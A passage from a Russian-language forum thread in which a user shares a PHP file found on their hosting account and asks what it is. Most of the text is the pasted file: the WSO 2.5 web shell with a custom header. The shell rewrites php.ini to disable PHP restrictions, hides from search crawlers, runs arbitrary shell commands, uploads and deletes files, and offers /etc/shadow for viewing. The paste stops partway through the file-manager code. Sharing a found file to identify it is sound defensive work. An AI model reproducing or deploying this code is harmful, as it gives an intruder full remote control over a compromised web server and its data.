powered by simpleCommunicator - 2.0.18     © 2024 Programmizd 02
Map
Форумы [новые:1] / Просто Трёп [закрыт для гостей] [новые:1] / Пэхапёбы есть?
25 сообщений из 57, страница 2 из 3
Пэхапёбы есть?
    #223339
XEugene
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 13:18
[игнорируется]
XEugene  25.11.2022, 13:15
[игнорируется]
Просто Трёп  25.11.2022, 09:26
[игнорируется]
XEugene  25.11.2022, 09:23
[игнорируется]
Казалось бы, причём тут пэхапэ?
Ну, там же файлик пэхапэ. Или вирус в пээнгэ?
А так это хостинг ругается на стандартный функционал WordPress. Уязвимость в нём нашел. То есть, сам сайт, то есть его движок - это и есть вирус. Надо удалить.
Думаешь, стандартный? Файлик-то появился несколько дней назад. А насколько я знаю, такие сайты настраиваются так, чтобы юзер, под которым движок запускается, не имел прав писать в каталоги, где пхп лежат. И к вордпрессу он никаким боком.
Ааа...
...
Рейтинг: 0 / 0
Пэхапёбы есть?
    #223340
XEugene
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Просто Трёп  25.11.2022, 13:19
[игнорируется]
XEugene  25.11.2022, 13:19
[игнорируется]
Просто Трёп  25.11.2022, 10:29
[игнорируется]
Ханурик  25.11.2022, 10:19
[игнорируется]
Ханурик  25.11.2022, 10:07
[игнорируется]
...
Короче, вот этот говноскрипт, который был там спрятан:
Код: PHP
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
248.
249.
250.
251.
252.
253.
254.
255.
256.
257.
258.
259.
260.
261.
262.
263.
264.
265.
266.
267.
268.
269.
270.
271.
272.
273.
274.
275.
276.
277.
278.
279.
280.
281.
282.
283.
284.
285.
286.
287.
288.
289.
290.
291.
292.
293.
294.
295.
296.
297.
298.
299.
300.
301.
302.
303.
304.
305.
306.
307.
308.
309.
310.
311.
312.
313.
314.
315.
316.
317.
318.
319.
320.
321.
322.
323.
324.
325.
326.
327.
328.
329.
330.
331.
332.
333.
334.
335.
336.
337.
338.
339.
340.
341.
342.
343.
344.
345.
346.
347.
348.
349.
350.
351.
352.
353.
354.
355.
356.
357.
358.
359.
360.
361.
362.
363.
364.
365.
366.
367.
368.
369.
370.
371.
372.
373.
374.
375.
376.
377.
378.
379.
380.
381.
382.
383.
384.
385.
386.
387.
388.
389.
390.
391.
392.
393.
394.
395.
396.
397.
398.
399.
400.
401.
402.
403.
404.
405.
406.
407.
408.
409.
410.
411.
412.
413.
414.
415.
416.
417.
418.
419.
420.
421.
422.
423.
424.
425.
426.
427.
428.
429.
430.
431.
432.
433.
434.
435.
436.
437.
438.
439.
440.
441.
442.
443.
444.
445.
446.
447.
448.
449.
450.
451.
452.
453.
454.
455.
456.
457.
458.
459.
460.
461.
462.
463.
464.
465.
466.
467.
468.
469.
470.
471.
472.
473.
474.
475.
476.
477.
478.
479.
480.
481.
482.
483.
484.
485.
486.
487.
488.
489.
490.
491.
492.
493.
494.
495.
496.
497.
498.
499.
500.
501.
502.
503.
504.
505.
506.
507.
508.
509.
510.
511.
512.
513.
514.
515.
516.
517.
518.
519.
520.
521.
522.
523.
524.
525.
526.
527.
528.
529.
530.
531.
532.
533.
534.
535.
536.
537.
538.
539.
540.
541.
542.
543.
544.
545.
546.
547.
548.
549.
550.
551.
552.
553.
554.
555.
556.
557.
558.
559.
560.
561.
562.
563.
564.
565.
566.
567.
568.
569.
570.
571.
572.
573.
574.
575.
576.
577.
578.
579.
580.
581.
582.
583.
584.
585.
586.
587.
588.
589.
590.
591.
592.
593.
594.
595.
596.
597.
598.
599.
600.
601.
602.
603.
604.
605.
606.
607.
608.
609.
610.
611.
612.
613.
614.
615.
616.
617.
618.
619.
620.
621.
622.
623.
624.
625.
626.
627.
628.
629.
630.
631.
632.
633.
634.
635.
636.
637.
638.
639.
640.
641.
642.
643.
644.
645.
646.
647.
648.
649.
650.
651.
652.
653.
654.
655.
656.
657.
658.
659.
660.
661.
662.
663.
664.
665.
666.
667.
668.
669.
670.
671.
672.
673.
674.
675.
676.
677.
678.
679.
680.
681.
682.
683.
684.
685.
686.
687.
688.
689.
690.
691.
692.
693.
694.
695.
696.
697.
698.
699.
700.
701.
702.
703.
704.
705.
706.
707.
708.
709.
710.
711.
712.
713.
714.
715.
716.
717.
718.
719.
720.
721.
722.
723.
724.
725.
726.
727.
728.
729.
730.
731.
732.
733.
734.
735.
736.
737.
738.
739.
740.
741.
742.
743.
744.
745.
746.
747.
748.
749.
750.
751.
752.
753.
754.
755.
756.
757.
758.
759.
760.
761.
762.
763.
764.
765.
766.
767.
768.
769.
770.
771.
772.
773.
774.
775.
776.
777.
778.
779.
780.
781.
782.
783.
784.
785.
786.
787.
788.
789.
790.
791.
792.
793.
794.
795.
796.
797.
798.
799.
800.
801.
802.
803.
804.
805.
806.
807.
808.
809.
810.
811.
812.
813.
814.
815.
816.
817.
818.
819.
820.
821.
822.
823.
824.
825.
826.
827.
828.
829.
830.
831.
832.
833.
834.
835.
836.
837.
838.
839.
840.
841.
842.
843.
844.
845.
846.
847.
848.
849.
850.
851.
852.
853.
854.
855.
856.
857.
858.
859.
860.
861.
862.
863.
864.
865.
866.
867.
868.
869.
870.
871.
872.
873.
874.
875.
876.
877.
878.
879.
880.
881.
882.
883.
884.
885.
886.
887.
888.
889.
890.
891.
892.
893.
894.
895.
896.
897.
898.
899.
900.
901.
902.
903.
904.
905.
906.
907.
908.
909.
910.
911.
912.
913.
914.
915.
916.
917.
918.
919.
920.
921.
922.
923.
924.
925.
926.
927.
928.
929.
930.
931.
932.
933.
934.
935.
936.
937.
938.
939.
940.
941.
942.
943.
944.
945.
946.
947.
948.
949.
950.
951.
952.
953.
954.
955.
956.
957.
958.
959.
960.
961.
962.
963.
964.
965.
966.
967.
968.
969.
970.
971.
972.
973.
974.
975.
976.
977.
978.
979.
980.
981.
982.
983.
984.
985.
986.
987.
988.
989.
990.
991.
992.
993.
994.
995.
996.
997.
998.
999.
1000.
1001.
1002.
1003.
1004.
1005.
1006.
1007.
1008.
1009.
1010.
1011.
1012.
1013.
1014.
1015.
1016.
1017.
1018.
1019.
1020.
1021.
1022.
1023.
1024.
1025.
1026.
1027.
1028.
1029.
1030.
1031.
1032.
1033.
1034.
1035.
1036.
1037.
1038.
1039.
1040.
1041.
1042.
1043.
1044.
1045.
1046.
1047.
1048.
1049.
1050.
1051.
1052.
1053.
1054.
1055.
1056.
1057.
1058.
1059.
1060.
1061.
1062.
1063.
1064.
1065.
1066.
1067.
1068.
1069.
1070.
1071.
1072.
1073.
1074.
1075.
1076.
1077.
1078.
1079.
1080.
1081.
1082.
1083.
1084.
1085.
1086.
1087.
1088.
1089.
1090.
1091.
1092.
1093.
1094.
1095.
1096.
1097.
1098.
1099.
1100.
1101.
1102.
1103.
1104.
1105.
1106.
1107.
1108.
1109.
1110.
1111.
1112.
1113.
1114.
1115.
1116.
1117.
1118.
1119.
1120.
1121.
1122.
1123.
1124.
1125.
1126.
1127.
1128.
1129.
1130.
1131.
1132.
1133.
1134.
1135.
1136.
1137.
1138.
1139.
1140.
1141.
1142.
1143.
1144.
1145.
1146.
1147.
1148.
1149.
1150.
1151.
1152.
1153.
1154.
1155.
1156.
1157.
1158.
1159.
1160.
1161.
1162.
1163.
1164.
1165.
1166.
1167.
1168.
1169.
1170.
1171.
1172.
1173.
1174.
1175.
1176.
1177.
1178.
1179.
1180.
1181.
1182.
1183.
1184.
1185.
1186.
1187.
1188.
1189.
1190.
1191.
1192.
1193.
1194.
1195.
1196.
1197.
1198.
1199.
1200.
1201.
1202.
1203.
1204.
1205.
1206.
1207.
1208.
1209.
1210.
1211.
1212.
1213.
1214.
1215.
1216.
1217.
1218.
1219.
1220.
1221.
1222.
1223.
1224.
1225.
1226.
1227.
1228.
1229.
1230.
1231.
1232.
1233.
1234.
1235.
1236.
1237.
1238.
1239.
1240.
1241.
1242.
1243.
1244.
1245.
1246.
1247.
1248.
1249.
1250.
1251.
1252.
1253.
1254.
1255.
1256.
1257.
1258.
1259.
1260.
1261.
1262.
1263.
1264.
1265.
1266.
1267.
1268.
1269.
1270.
1271.
1272.
1273.
1274.
1275.
1276.
1277.
1278.
1279.
1280.
1281.
1282.
1283.
1284.
1285.
1286.
1287.
1288.
1289.
1290.
1291.
1292.
1293.
1294.
1295.
1296.
1297.
1298.
1299.
/*
  Mod
*/

$ini  = "safe_mode=off\ndisable_functions=\nupload_max_filesize = 10M\npost_max_size = 10M";
$ht = @fopen ('php.ini','w');
if($ht) {
  fwrite($ht, $ini);
  fclose($ht);
}

if(isset($_POST['checkwp']))
{
  if(file_exists('wp-config.php')) echo 'Yeahhh';
}

if(isset($_REQUEST['joke']))
{
  if(trim($_REQUEST['joke']) != '')
  {
    $me = basename($_SERVER['SCRIPT_FILENAME']);
    $lul = file_get_contents($me);
    $z0r = str_replace($wp_nonce, md5(trim($_REQUEST['joke'])), $lul);
    $lol = fopen($me, "w");
    fwrite($lol, $z0r);
    fclose($lol);
    if(stristr(file_get_contents($me), md5(trim($_REQUEST['joke']))))
    {
      echo 'passwordchanged';
    } else {
      echo 'fail';
    }
  }
  exit;
}
if(isset($_REQUEST['newname']))
{
  if(trim($_REQUEST['newname']) != '')
  {
    $name = trim($_REQUEST['newname']).'.php';
    $me = basename($_SERVER['SCRIPT_FILENAME']);
    $lul = file_get_contents($me);
    $lol = fopen($name, "w");
    fwrite($lol, $lul);
    fclose($lol);
    if(file_exists($name))
    {
      unlink($me);
      echo 'v0ld3m0rt:'.$name.':v0ld3m0rt';
    }
  }
  exit;
}
/*
  End Mod
*/

$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')) @set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
  function WSOstripslashes($array) {
    return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  }
  $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
  die("<center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></center>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($wp_nonce)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $wp_nonce))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $wp_nonce);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $wp_nonce))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
  $os = 'win';
else
  $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
  @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
  $home_cwd = str_replace("\\", "/", $home_cwd);
  $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
  $cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

function wsoHeader() {
  if(empty($_POST['charset']))
    $_POST['charset'] = $GLOBALS['default_charset'];
  global $color;
  echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
  function set(a,c,p1,p2,p3,charset) {
    if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
    if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
    if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
    if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
    if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
    if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  }
  function g(a,c,p1,p2,p3,charset) {
    set(a,c,p1,p2,p3,charset);
    d.mf.submit();
  }
  function a(a,c,p1,p2,p3,charset) {
    set(a,c,p1,p2,p3,charset);
    var params = 'ajax=true';
    for(i=0;i<d.mf.elements.length;i++)
      params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
    sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
  }
  function sr(url, params) {
    if (window.XMLHttpRequest)
      req = new XMLHttpRequest();
    else if (window.ActiveXObject)
      req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
  }
  function processReqChange() {
    if( (req.readyState == 4) )
      if(req.status == 200) {
        var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
        var arr=reg.exec(req.responseText);
        eval(arr[2].substr(0, arr[1]));
      } else alert('Request error!');
  }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
  $freeSpace = @diskfreespace($GLOBALS['cwd']);
  $totalSpace = @disk_total_space($GLOBALS['cwd']);
  $totalSpace = $totalSpace?$totalSpace:1;
  $release = @php_uname('r');
  $kernel = @php_uname('s');
  $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
  if(strpos('Linux', $kernel) !== false)
    $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
  else
    $explink .= urlencode($kernel . ' ' . substr($release,0,3));
  if(!function_exists('posix_getegid')) {
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
  } else {
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
  }

  $cwd_links = '';
  $path = explode("/", $GLOBALS['cwd']);
  $n=count($path);
  for($i=0; $i<$n-1; $i++) {
    $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
    for($j=0; $j<=$i; $j++)
      $cwd_links .= $path[$j].'/';
    $cwd_links .= "\")'>".$path[$i]."/</a>";
  }

  $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  $opt_charsets = '';
  foreach($charsets as $item)
    $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

  $m = array('Sec. Info'=>'SecInfo','Mail Test'=>'MailTest','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql');
  if(!empty($GLOBALS['wp_nonce']))
    $m['Logout'] = 'Logout';
  $m['Self remove'] = 'SelfRemove';
  $menu = '';
  foreach($m as $k => $v)
    $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

  $drives = "";
  if($GLOBALS['os'] == 'win') {
    foreach(range('c','z') as $drive)
    if(is_dir($drive.':\\'))
      $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  }
  echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}

function wsoFooter() {
  $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
  <tr>
    <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
    <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  </tr><tr>
    <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
    <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  </tr><tr>
    <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
    <td><form method='post' ENCTYPE='multipart/form-data'>
    <input type=hidden name=a value='FilesMAn'>
    <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
    <input type=hidden name=p1 value='uploadFile'>
    <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
    <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
  </tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

function wsoEx($in) {
  $out = '';
  if (function_exists('exec')) {
    @exec($in,$out);
    $out = @join("\n",$out);
  } elseif (function_exists('passthru')) {
    ob_start();
    @passthru($in);
    $out = ob_get_clean();
  } elseif (function_exists('system')) {
    ob_start();
    @system($in);
    $out = ob_get_clean();
  } elseif (function_exists('shell_exec')) {
    $out = shell_exec($in);
  } elseif (is_resource($f = @popen($in,"r"))) {
    $out = "";
    while(!@feof($f))
      $out .= fread($f,1024);
    pclose($f);
  }
  return $out;
}

function wsoViewSize($s) {
    if (is_int($s))
        $s = sprintf("%u", $s);

  if($s >= 1073741824)
    return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  elseif($s >= 1048576)
    return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  elseif($s >= 1024)
    return sprintf('%1.2f', $s / 1024 ) . ' KB';
  else
    return $s . ' B';
}

function wsoPerms($p) {
  if (($p & 0xC000) == 0xC000)$i = 's';
  elseif (($p & 0xA000) == 0xA000)$i = 'l';
  elseif (($p & 0x8000) == 0x8000)$i = '-';
  elseif (($p & 0x6000) == 0x6000)$i = 'b';
  elseif (($p & 0x4000) == 0x4000)$i = 'd';
  elseif (($p & 0x2000) == 0x2000)$i = 'c';
  elseif (($p & 0x1000) == 0x1000)$i = 'p';
  else $i = 'u';
  $i .= (($p & 0x0100) ? 'r' : '-');
  $i .= (($p & 0x0080) ? 'w' : '-');
  $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  $i .= (($p & 0x0020) ? 'r' : '-');
  $i .= (($p & 0x0010) ? 'w' : '-');
  $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  $i .= (($p & 0x0004) ? 'r' : '-');
  $i .= (($p & 0x0002) ? 'w' : '-');
  $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  return $i;
}

function wsoPermsColor($f) {
  if (!@is_readable($f))
    return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
  elseif (!@is_writable($f))
    return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
  else
    return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}

function wsoScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function wsoWhich($p) {
  $path = wsoEx('which ' . $p);
  if(!empty($path))
    return $path;
  return false;
}

function actionSecInfo() {
  wsoHeader();
  echo '<h1>Server security information</h1><div class=content>';
  function wsoSecParam($n, $v) {
    $v = trim($v);
    if($v) {
      echo '<span>' . $n . ': </span>';
      if(strpos($v, "\n") === false)
        echo $v . '<br>';
      else
        echo '<pre class=ml1>' . $v . '</pre>';
    }
  }

  wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
  wsoSecParam('Open base dir', @ini_get('open_basedir'));
  wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  $temp=array();
  if(function_exists('mysql_get_client_info'))
    $temp[] = "MySql (".mysql_get_client_info().")";
  if(function_exists('mssql_connect'))
    $temp[] = "MSSQL";
  if(function_exists('pg_connect'))
    $temp[] = "PostgreSQL";
  if(function_exists('oci_connect'))
    $temp[] = "Oracle";
  wsoSecParam('Supported databases', implode(', ', $temp));
  echo '<br>';

  if($GLOBALS['os'] == 'nix') {
            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            wsoSecParam('OS version', @file_get_contents('/proc/version'));
            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    wsoSecParam('Users', $temp);
                }
            }
  } else {
    wsoSecParam('OS Version',wsoEx('ver'));
    wsoSecParam('Account Settings',wsoEx('net accounts'));
    wsoSecParam('User Accounts',wsoEx('net user'));
  }
  echo '</div>';
  wsoFooter();
}

function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);

  if(!empty($_POST['p1'])) {
    switch($_POST['p1']) {
      case 'uploadFile':
        if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
          echo "Can't upload file!";
        break;
      case 'mkdir':
        if(!@mkdir($_POST['p2']))
          echo "Can't create new dir";
        break;
      case 'delete':
        function deleteDir($path) {
          $path = (substr($path,-1)=='/') ? $path:$path.'/';
          $dh  = opendir($path);
          while ( ($item = readdir($dh) ) !== false) {
            $item = $path.$item;
            if ( (basename($item) == "..") || (basename($item) == ".") )
              continue;
            $type = filetype($item);
            if ($type == "dir")
              deleteDir($item);
            else
              @unlink($item);
          }
          closedir($dh);
          @rmdir($path);
        }
        if(is_array(@$_POST['f']))
          foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
            $f = urldecode($f);
            if(is_dir($f))
              deleteDir($f);
            else
              @unlink($f);
          }
        break;
